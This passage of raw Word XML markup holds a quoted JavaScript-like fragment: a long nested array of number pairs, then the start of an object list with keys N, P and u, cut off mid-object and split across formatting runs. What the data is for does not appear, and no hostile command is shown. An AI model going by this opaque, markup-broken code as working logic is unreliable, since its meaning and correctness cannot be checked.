[4, 107], [6, 202], [0, 218], [8, 73], [5, 67], [7, 141], [3, 152], [8, 197], [2, 164], [4, 121], [7, 84], [2, 205], [9, 102], [5, 22], [9, 143], [8, 105], [0, 76], [0, 221], [1, 97], [4, 37],[7, 204], [8, 180], [0, 225], [9, 177], [4, 39], [0, 184], [8, 126], [5, 124], [2, 74], [9, 53], [4, 199], [6, 195], [2, 52], [7, 166], [7, 89], [3, 87], [9, 45], [0, 131], [1, 161], [3, 38], [1, 210], [4, 80], [0, 160], [5, 220], [8, 6], [6, 214], [1, 150], [1, 224], [8, 153], [8, 77], [5, 106], [5, 206], [2, 54], [4, 4], [5, 173], [4, 194], [7, 137], [8, 100], [8, 208], [7, 19], [7, 18], [1, 132], [7, 128], [7, 182], [1, 33], [3, 213], [4, 96], [0, 69], [9, 34], [3, 92], [1, 58], [8, 81], [8, 207], [8, 10], [4, 30], [7, 83], [9, 8], [9, 123], [7, 50], [4, 31], [0, 138], [1, 176], [4, 36], [9, 21], [2, 112], [5, 219], [5, 35], [2, 61], [3, 171], [4, 163], [9, 193], [6, 98], [2, 60], [8, 70], [3, 40], [1, 14], [1, 104], [4, 93], [4, 101], [6, 133], [1, 179], [5, 49], [0, 191], [4, 103], [9, 129], [1, 23], [2, 229], [2, 3], [7, 175], [7, 178], [0, 154], [5, 115], [6, 59], [6, 111], [9, 127], [2, 170], [6, 1], [3, 78], [5, 72], [9, 209], [8, 185], [3, 159], [1, 151], [9, 188], [7, 169], [7, 136], [1, 196], [2, 62],[3, 90], [4, 167], [3, 44], [4, 42], [5, 114], [7, 29], [4, 82], [4, 217], [6, 85], [0, 32], [5, 56], [2, 226], [5, 11], [3, 2], [3, 174], [9, 227], [8, 223], [9, 117], [4, 48], [9, 230], [9, 155], [3, 211], [5, 51], [0, 13], [7, 148], [7, 108], [0, 41], [2, 113], [8, 9], [0, 142], [3, 46], [7, 75]], [[3, 163], [4, 117], [4, 23], [5, 104], [3, 15], [8, 64], [0, 99], [4, 94], [0, 159], [7, 167], [7, 26], [8, 164], [2, 196], [9, 175], [3,60], [6, 227], [0, 205], [7, 78], [0, 189], [4, 110], [2, 75], [8, 230], [5, 223], [5, 48], [4, 65], [2, 161], [6, 24], [2, 139], [1, 206], [5, 14], [6, 36], [0, 128], [5, 41], [3, 83], [2, 53], [9, 115], [6, 50], [6, 120], [7, 11], [4, 46], [4, 121], [6, 202], [6, 114], [4, 8], [5, 129], [2,201], [9, 155], [6, 107], [5, 58], [8, 136], [0, 207], [5, 177], [4, 5], [7, 10], [6, 219], [7, 152], [4, 29], [3, 86], [6, 222], [8, 166], [0, 138], [0, 106], [3, 84], [6, 49], [2, 82], [7, 200], [2, 217], [9, 211], [3, 171], [9, 119], [9, 43], [9, 102], [3, 148], [6, 178], [1, 228], [9, 165], [5, 33], [8, 142], [2, 150], [6, 118], </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">[0, 187], [7, 100], [8, 12], [5, 190], [6, 124], [4, 199], [4, 185], [4, 194], [5, 220], [2, 113], [7, 70], [7, 127], [6, 151], [1, 57], [2, 197], [8, 81], [7, 210], [6, 51], [9, 69], [7, 198], [4, 92], [1, 143], [6, 95], [8, 203], [5, 91], [6, 22], [4, 37], [6, 214], [4, 9], [2, 162], [4, 135], [0, 172], [6, 173], [8, 112], [3, 180], [9, 39], [7, 168], [5, 192], [0, 40], [4, 131], [8, 146], [4, 87], [9, 111], [8, 208], [9, 103], [8, 88], [1, 213], [3, 42], [3, 105], [8, 17], [8, 174], [9, 47], [3, 186], [0, 212], [0, 126], [6, 218], [0, 38], [2, 72], [7, 55], [0, 77], [0, 193], [1, 45], [8, 179], [2, 62], [3, 66], [7, 147], [7, 59], [4, 145], [3, 85], [8, 149], [0, 19], [4, 2], [6, 116], [5, 182], [5, 191], [2, 90], [1, 122], [2, 56], [2, 13], [7, 209], [8, 183], [9, 134], [1, 27], [3, 34], [7, 133], [4, 35], [2, 144], [7, 3], [9, 195], [6, 61], [2, 63], [7, 0], [8, 108], [8, 7], [9, 4], [8, 204], [4, 73], [1, 169], [2, 1], [5, 44], [4, 76], [6, 98], [0, 21], [7, 157], [8, 137], [0, 160], [0, 32], [0, 156], [3, 130], [4, 109], [9, 221], [2, 54], [7, 154], [4, 79], [1, 71], [5, 170], [0, 153], [3, 226], [1, 141], [0,68], [6, 140], [1, 125], [0, 188], [5, 123], [2, 93], [4, 132], [3, 181], [4, 176], [9, 229], [6, 216], [8, 224], [6, 6], [0, 74], [9, 101], [6, 31], [4, 158], [5, 225], [2, 52], [8, 28], [5, 16], [0, 20], [2, 67], [3, 80], [7, 18], [9, 184], [8, 97], [7, 30], [7, 215], [9, 96], [5, 25], [9, 89]], [[9, 37], [6, 52], [4, 82], [5, 151], [6, 99], [9, 23], [2, 179], [0, 80], [4, 96], [0, 154], [3, 71], [0, 8], [7, 195], [9, 26], [1, 225], [9, 180], [6, 170], [4, 81], [7, 185], [5, 218], [9, 4], [9, 86], [2, 87], [4, 44], [1, 38], [2, 42], [1, 199], [6, 113], [7, 105], [9, 141], [0, 28], [3, 150], [4, 109], [0, 164], [4, 102], [7, 128], [0, 50], [1, 31], [0, 166], [2, 10], [3, 162], [1, 6], [2, 65], [7, 189], [7, 79], [7, 149], [2, 174], [6, 24], [8, 84], [6, 186], [7, 1], [5, 98], [7, 208], [9, 201], [3, 17], [4, 18], [0, 182], [3, 118], [2, 56], [8, 153], [0, 157], [8, 196], [4, 122], [0, 152], [5, 222], [9, 137], [5, 68], [4, 63], [7, 66], [9, 139], [3, 69], [7, 132], [3, 210], [5, 70], [9, 209], [1, 230], [1, 173], [5, 130], [3, 217], [4, 14], [5, 143], [4, 197], [1, 60], [3, 194], [2, 49], [8, 207], [6, 155], [3, 229], [7, 116], [9, 192], [7, 72], [6, 184],[1, 101], [6, 193], [6, 131], [5, 15], [2, 206], [5, 200], [9, 160], [0, 92], [1, 216], [9, 203], [9, 110], [4, 53], [5, 123], [5, 167], [6, 91], [8, 97], [6, 20], [3, 62], [9, 40], [6, 108], [4, 161], [5, 43], [2, 177], [0, 158], [4, 111], [2, 34], [2, 129], [9, 55], [4, 211], [9, 58], [2, 47], [5, 74], [3, 67], [0, 165], [1, 21], [8, 61], [9, 90], [0, 176], [6, 135], [3, 147], [2, 35], [4, 103], [3, 144], [7, 215], [1, 171], [6, 54], [3, 134], [8, 187], [4, 183], [2, 89], [8, 0], [1, 168], [5, 107], [7, 127], [8, 25], [4, 100], [9, 224], [8, 41], [0, 39], [5, 126], [0, 181], [0,7], [5, 140], [4, 32], [4, 45], [8, 57], [3, 106], [6, 172], [8, 59], [6, 73], [8, 188], [8, 169], [1, 78], [3, 36], [9, 93], [7, 121], [5, 125], [0, 223], [8, 5], [4, 133], [9, 9], [7, 220], [6, 3], [2, 85], [2, 221], [0, 33], [6, 27], [6, 2], [1, 51], [6, 175], [3, 22], [2, 142], [8, 204], [5, 138], [5, 159], [7, 146], [3, 178], [0, 156], [5, 115], [7, 83], [7, 202], [6, 30], [4, 228], [5, 19], [8, 136], [0, 119], [9, 205], [4, 75], [0, 191], [8, 163], [3, 213], [9, 124], [6, 114], [2, 11], [8, 112], [7, 77], [3, 227], [5, 64], [4, 145], [8, 219], [1, 148], [5, 214], [8, 88], [5, 29], [7, 13], [8, 95], [1, 117], [7, 12], [3, 94], [8, 46], [8, 104], [9, 226], [4, 76], [0, 212], [3, 190], [3, 48], [3, 198], [5, 16], [3, 120]], [[2, 49], [1, 50], [8, 86], [6, 132], [8, 73], [2, 167], [8, 180], [9, 121], [7, 123], [6, 88], [5, 108], [7, 22], [3, 40], [5, 122], [0, 228], [6, 130], [3, 183], [1, 157], [9, 200], [4, 166], [4, 85], [5, 8], [5, 106], [5, 21], [1, 91], [2, 113], [3, 41], [4, 74], [5, 0], [4, 75], [7, 69], [1, 160], [8, 223], [2, 199], [9, 93], [2, 148], [8, 227], [3, 39], [3, 182], [1, 36], </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">[2, 215], [9, 173], [0, 143], [7, 57], [2, 128], [4, 16], [8, 5], [5, 151], [0, 155], [9, 84], [9, 129], [5, 96], [6, 114], [4, 205], [7, 222], [0, 126], [0, 158], [8, 174], [9, 153], [2, 66], [4, 209], [4, 2], [8, 35], [3, 198], [0, 144], [0, 78], [2, 163], [0, 201], [0, 76], [8, 145], [2, 181], [9, 176], [4, 10], [6, 99], [2, 159], [6, 31], [9, 43], [6, 188], [7, 118], [3, 48], [7, 112], [6, 216], [8, 136], [1, 170], [6, 51], [3, 44], [4, 221], [6, 79], [7, 59], [1, 95], [5, 120], [0, 4], [3,37], [5, 70], [7, 27], [7, 219], [9, 169], [4, 125], [5, 187], [4, 150], [7, 202], [9, 18], [3, 154], [5, 68], [4, 217], [1, 117], [8, 225], [9, 226], [9, 42], [8, 32], [4, 53], [5, 141], [2, 71], [2, 146], [2, 81], [0, 208], [3, 196], [1, 11], [4, 61], [2, 162], [7, 47], [6, 56], [6, 179], [0, 175], [9, 87], [5, 133], [0, 109], [6, 171], [8, 186], [6, 204], [7, 138], [3, 107], [6, 64], [2, 14], [7, 135], [5, 101], [2, 164], [2, 97], [2, 213], [1, 203], [7, 197], [3, 214], [0, 13], [5, 212], [7, 211], [6, 190], [4, 100], [1, 134], [5, 26], [2, 124], [3, 15], [3, 189], [0, 52], [0,45], [5, 220], [1, 94], [9, 229], [0, 58], [5, 156], [4, 33], [7, 62], [1, 20], [9, 72], [5, 7], [9, 103], [1, 102], [3, 55], [7, 218], [8, 194], [2, 83], [9, 67], [6, 6], [9, 46], [5, 19], [9, 34], [8, 28], [1, 12], [9, 172], [7, 17], [8, 105], [4, 29], [6, 77], [3, 127], [6, 54], [0, 98], [0, 177], [7, 60], [2, 142], [4, 207], [9, 111], [8, 139], [0, 224], [9, 168], [1, 131], [9, 210], [8, 63], [1, 110], [6, 3], [0, 119], [0, 30], [2,65], [7, 149], [2, 193], [9, 184], [5, 23], [7, 147], [7, 140], [4, 206], [3, 38], [7, 165], [9, 161], [8, 115], [2, 104], [5, 152], [3, 137], [4,25], [5, 192], [7, 24], [5, 230], [5, 82], [1, 80], [0, 90], [7, 195], [2, 116], [9, 191], [5, 9], [1, 185], [3, 89], [3, 1], [9, 178], [9, 92]], [[2, 121], [3, 147], [9, 93], [3, 230], [2, 223], [6, 200], [6, 89], [9, 115], [3, 77], [2, 103], [2, 204], [3, 145], [5, 142], [9, 95], [8, 176], [7, 59], [3, 52], [8, 141], [7, 172], [6, 10], [1, 73], [7, 171], [1, 51], [2, 178], [0, 194], [0, 143], [3, 15], [0, 133], [3, 53], [9, 189], [2, 159], [0, 106], [3, 210], [0, 157], [8, 81], [5, 190], [2, 185], [3, 197], [6, 70], [9, 174], [3, 24], [5, 37], [2, 3], [5, 160], [7, 168], [4, 62], [5, 57], [0, 135], [0, 7], [4, 4], [4, 161], [1, 5], [4, 44], [0, 85], [1, 216], [0, 217], [6, 124], [8, 206], [9, 211], [1, 125], [3, 49], [2, 213], [8, 166], [7, 80], [3, 100], [0, 19], [4, 164], [9, 16], [5, 192], [1, 138], [2, 86], [2, 177], [0, 122], [9, 108], [1, 22], [5, 113], [9, 131], [1, 101], [2, 181], [7, 72], [6, 43], [3, 222], [2, 40], [7, 41], [5, 13], [8, 25], [3, 48], [2, 104], [1, 130], [1, 63], [3, 45], [0, 50], [4, 84], [5, 126], [1, 18], [6, 35], [1, 165], [7, 23], [0, 146], [6, 153], [8, 212], [5, 111], [6, 32], [2, 220], [4, 187], [2, 184], [7, 215], [0, 17], [5, 47], [5, 39], [3, 148], [1, 91], [2, 36], [0, 105], [3, 65], [2, 186], [1, 38], [3, 227], [4, 6], [2, 134], [9, 199], [3, 155], [6, 229], [4, 162], [1, 198], [5, 170], [6, 94], [7, 78], [5, 139], [1, 76], [7, 99], [6, 12], [2, 225], [8, 140], [9, 82], [4, 228], [0, 127], [2, 201], [0, 128], [3, 151], [4, 163], [9, 87], [8, 120], [2, 29], [0, 56], [2, 179], [4, 26], [2, 167], [3, 74], [8, 118], [2, 205], [7, 180], [9, 158], [2, 2],[5, 109], [7, 34], [4, 28], [1, 193], [4, 79], [9, 90], [0, 21], [7, 58], [6, 116], [7, 169], [0, 218], [9, 66], [8, 137], [3, 102], [0, 112], [6,183], [3, 68], [0, 97], [5, 149], [0, 188], [8, 98], [0, 226], [1, 191], [5, 61], [9, 27], [1, 154], [7, 9], [0, 30], [7, 33], [0, 221], [1, 214],[0, 11], [7, 83], [8, 46], [7, 182], [8, 8], [0, 75], [9, 67], [1, 195], [8, 207], [1, 224], [5, 119], [9, 132], [7, 69], [1, 0], [8, 110], [4, 156], [6, 88], [0, 123], [6, 1], [5, 96], [1, 31], [4, 219], [7, 117], [1, 55], [8, 107], [8, 129], [2, 202], [2, 175], [7, 114], [8, 92], [7, 42], [5, 64], [6, 203], [8, 150], [0, 173], [6, 136], [1, 152], [2, 54], [7, 208], [3, 71], [7, 196], [9, 144], [5, 209], [6, 14], [2, 60], [6, 20]], [[4, 72], [7, </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">81], [1, 124], [1, 94], [3, 151], [7, 154], [3, 66], [0, 160], [5, 90], [8, 60], [6, 172], [0, 61], [0, 143], [2, 158], [9, 127], [5, 36], [7, 24], [5, 190], [4, 195], [5, 106], [7, 150], [6, 119], [6, 37], [6, 45], [3, 7], [0, 130], [5, 169], [9, 133], [3, 9], [2, 210], [5, 228], [0, 52], [1, 122], [5, 164], [2, 202], [5, 128], [8, 138], [4, 201], [8, 4], [6, 42], [5, 70], [1, 208], [3, 156], [5, 137], [4, 111], [2, 43], [4, 93], [4, 31], [2, 104], [0, 147], [7, 84], [3, 165], [8, 5], [3, 185], [9, 186], [9, 58], [5, 92], [2, 207], [7, 155], [4, 177], [1, 86], [9, 211],[0, 73], [4, 62], [7, 131], [7, 116], [3, 132], [5, 196], [4, 99], [5, 1], [5, 103], [6, 204], [8, 51], [4, 78], [6, 182], [5, 82], [9, 206], [3, 166], [4, 171], [5, 74], [0, 27], [5, 105], [0, 215], [7, 50], [4, 8], [2, 109], [8, 214], [5, 199], [5, 11], [2, 101], [5, 200], [3, 100], [6, 18], [9, 129], [3, 223], [4, 10], [4, 163], [8, 220], [8, 22], [8, 191], [3, 146], [4, 125], [6, 88], [1, 181], [1, 85], [2, 33], [3, 226], [6, 140], [9, 54], [1, 219], [3, 26], [8, 114], [7, 67], [6, 25], [4, 29], [8, 110], [3, 118], [7, 71], [1, 227], [5, 56], [0, 145], [6, 77], [7, 221], [3, 192], [6, 39], [7, 216], [3, 6], [4, 120], [2, 80], [8, 229], [6, 230], [4, 152], [9, 59], [5, 203], [1, 224], [7, 96], [3, 123], [4, 30], [2, 121],[8, 175], [2, 141], [3, 16], [0, 55], [3, 91], [8, 53], [7, 212], [5, 148], [0, 48], [8, 144], [7, 83], [9, 218], [2, 44], [2, 217], [5, 32], [9, 28], [3, 49], [0, 63], [3, 189], [5, 14], [3, 2], [8, 178], [2, 57], [0, 168], [6, 179], [3, 153], [0, 3], [6, 13], [2, 135], [6, 213], [7, 102], [4, 21], [8, 117], [7, 187], [6, 76], [9, 174], [3, 157], [8, 35], [3, 0], [1, 20], [4, 113], [1, 19], [3, 38], [7, 68], [2, 107], [1, 142], [2, 23], [5, 115], [7, 95], [0, 184], [6, 159], [1, 205], [7, 126], [7, 197], [3, 183], [1, 176], [3, 69], [9, 15], [4, 79], [9, 188], [0, 89], [7, 149], [1, 194], [8, 209], [3, 34], [5, 193], [2, 87], [7, 112], [3, 98], [3, 97], [6, 46], [8, 139], [0, 108], [7, 198], [4, 17], [6, 64], [8, 167], [4, 225], [5, 41], [0, 75], [0, 12], [9, 47], [1, 161], [6, 65], [5, 170], [0, 222], [1, 180], [0, 173], [5, 162], [3, 134], [5, 136], [5, 40]], [[0, 64], [6, 151], [7, 224], [8, 185], [6, 207], [0, 149], [6, 83], [6, 184], [4, 141], [6, 89], [7, 68], [9, 55], [5, 193], [9, 30], [3, 57], [6, 90], [6, 16], [1, 211], [4, 182], [9, 119], [3, 126], [9, 230], [6, 85], [2, 127], [8, 79], [5, 47], [6, 102], [9, 38], [4, 189], [8, 180], [6, 59], [6,91], [1, 171], [7, 131], [0, 161], [1, 48], [9, 115], [1, 15], [1, 120], [4, 214], [7, 157], [8, 158], [7, 82], [3, 56], [8, 156], [3, 61], [5, 41], [0, 186], [4, 139], [8, 65], [5, 113], [2, 148], [7, 135], [3, 103], [0, 71], [1, 167], [3, 3], [0, 105], [3, 92], [8, 37], [0, 72], [2, 9], [8,67], [4, 176], [5, 14], [6, 229], [5, 146], [4, 108], [1, 74], [2, 70], [7, 133], [0, 201], [5, 153], [8, 216], [2, 159], [8, 96], [0, 228], [9, 227], [8, 0], [0, 5], [3, 117], [2, 173], [1, 181], [6, 204], [8, 75], [6, 7], [0, 33], [0, 217], [3, 220], [9, 25], [7, 175], [0, 86], [2, 206], [6, 27], [6, 205], [3, 42], [4, 106], [1, 172], [4, 213], [6, 168], [4, 87], [1, 18], [4, 17], [8, 6], [3, 54], [7, 179], [4, 128], [6, 132], [0, 138], [2, 169], [0, 225], [9, 130], [1, 174], [2, 223], [8, 53], [5, 142], [2, 199], [2, 160], [7, 166], [7, 40], [3, 23], [3, 76], [9, 28], [0, 94], [4, 88], [3, 104], [5, 210], [7, 66], [9, 165], [4, 63], [5, 107], [2, 197], [9, 125], [6, 21], [9, 110], [7, 112], [6, 116], [9, 226], [8, 122], [5, 140], [5, 93], [4, 164], [7, 155], [5, 4], [3, 95], [5, 50], [4, 60], [9, 12], [6, 32], [8, 19], [7, 187], [0, 35], [1, 121], [3, 192], [6, 22],[2, 84], [9, 200], [8, 46], [1, 203], [5, 109], [2, 80], [3, 114], [1, 209], [4, 13], [0, 129], [8, 78], [3, 162], [8, 29], [8, 8], [4, 152], [2, 20], [6, 98], [8, 170], [1, 36], [7, 26], [4, 194], [6, 10], [9, 118], [5, 188], [5, 81], [0, 215], [7, 97], [7, 191], [2, 124], [0, 143], [8, 100], [9, 101], [4, 198], [3, 1], [1, 45], [1, 11], [0, 31], [5, </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>218], [1, 212], [8, 44], [5, 134], [7, 154], [6, 202], [0, 177], [3, 34], [4, 219], [0, 196], [2, 62], [1, 144], [6, 99], [2, 49], [7, 221], [0, 178], [4, 190], [6, 111], [8, 52], [8, 147], [7, 24], [9, 183], [7, 69], [1, 73], [2, 43], [2, 39], [7, 195], [2, 2], [9, 145], [7, 150], [6, 136], [8, 222], [3, 51], [4, 77], [1, 137], [1, 58], [0, 208], [7, 163], [4, 123]], [[9, 16],[4, 69], [5, 162], [0, 56], [8, 197], [6, 159], [4, 84], [3, 25], [3, 52], [9, 11], [9, 76], [8, 223], [6, 147], [3, 7], [3, 39], [7, 230], [3, 155], [1, 75], [1, 165], [2, 206], [0, 205], [8, 179], [5, 198], [6, 28], [3, 123], [6, 102], [2, 149], [7, 137], [0, 227], [4, 186], [2, 74], [4, 212], [1, 225], [7, 5], [8, 98], [4, 77], [5, 21], [9, 220], [9, 38], [1, 10], [5, 73], [4, 53], [9, 49], [8, 121], [0, 156], [8, 113], [3, 32], [7, 175], [9, 89], [2, 107], [5, 188], [6, 57], [6, 81], [8, 50], [0, 120], [5, 17], [0, 80], [7, 55], [4, 96], [2, 14], [1, 151], [5, 128], [5, 131], [0, 158], [6, 130], [7, 145], [4, 23], [4, 106], [8, 64], [5, 90], [8, 214], [9, 29], [3, 71], [7, 119], [8, 66], [9, 211], [8, 30], [0, 63], [9, 164], [6, 178], [5, 35], [3, 114], [7, 13], [0, 40], [7, 9], [4, 109], [5, 216], [7, 189], [5, 94], [8, 173], [0, 61], [1, 27], [2, 184], [0, 41], [7, 166], [5, 170], [8, 78], [1, 54], [8, 72], [3, 185], [7, 126], [7, 146], [4, 217], [6, 43], [5, 20], [4, 213], [4, 221], [8, 157], [2, 51], [7, 8], [6, 229], [5, 2], [0, 194], [6, 122], [5, 222], [2, 200], [1, 168], [7, 132], [2, 135], [2, 196], [3, 199], [4, 141], [0, 112], [7, 45], [2, 167], [1, 133], [9, 210], [0, 67], [8, 62], [1, 26], [2, 138], [5, 103], [3, 93], [2, 154], [8, 12], [8, 68], [9, 99], [8, 85], [1, 105], [4, 176], [5, 129], [2, 124], [0, 83], [3, 97], [7, 218], [6, 104], [8, 228], [3, 172], [7, 70], [0, 95], [8, 171], [8, 108], [4, 204], [0, 47], [7, 110], [3,37], [2, 34], [8, 181], [3, 209], [5, 91], [6, 58], [1, 148], [8, 4], [8, 116], [9, 224], [1, 18], [8, 201], [0, 203], [9, 193], [0, 134], [9, 36], [6, 143], [9, 48], [0, 163], [2, 174], [9, 86], [4, 115], [3, 82], [4, 161], [9, 33], [7, 1], [4, 79], [0, 160], [9, 87], [2, 190], [7, 15], [1, 153], [3, 59], [8, 46], [3, 177], [1, 92], [3, 100], [4, 139], [5, 117], [8, 187], [8, 226], [2, 101], [4, 183], [9, 111], [0, 19], [1, 144], [6, 6], [7, 142], [5, 136], [7, 42], [6, 60], [4, 22], [3, 118], [7, 191], [8, 24], [4, 152], [0, 65], [5, 88], [7, 140], [2, 195], [0, 31], [2, 127], [4, 125], [6, 182], [4, 3], [3, 207], [1, 208], [4, 169], [3, 202], [7, 219], [1, 180], [8, 150], [5, 192], [3, 44], [0, 215], [1, 0]]];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DB0A0C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt;     var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = [{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1D34B8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7C3FD3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 4, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA95858" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 2, 3, 117]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAF07E0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCE0966" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4B4C9F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 3, 4, 5, 6, 7, 8, 9, 10, 11, 13, 14],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C73CF0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 2, 12, 15, 19, 22, 67, 131, 159, 183, 311, 317, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0779A07A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600E2144" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191F0958" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B62E10" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [26]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26120563" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C657E2F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA69508" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB04A72" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [12]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F24B8AE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECDA6B5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028129C7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302C575D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 5, 7, 9, 303]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30205ABD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6445C7DE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64118D3A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1063D466" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D7F6DD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582663C3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CE03C2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2173141A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [25, 28, 216]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D6EF21" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA09BFC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428CC19A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEC0D7C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CE0E08" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FD4DC1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [11],</w:t>
      </w:r>
    </w:p>
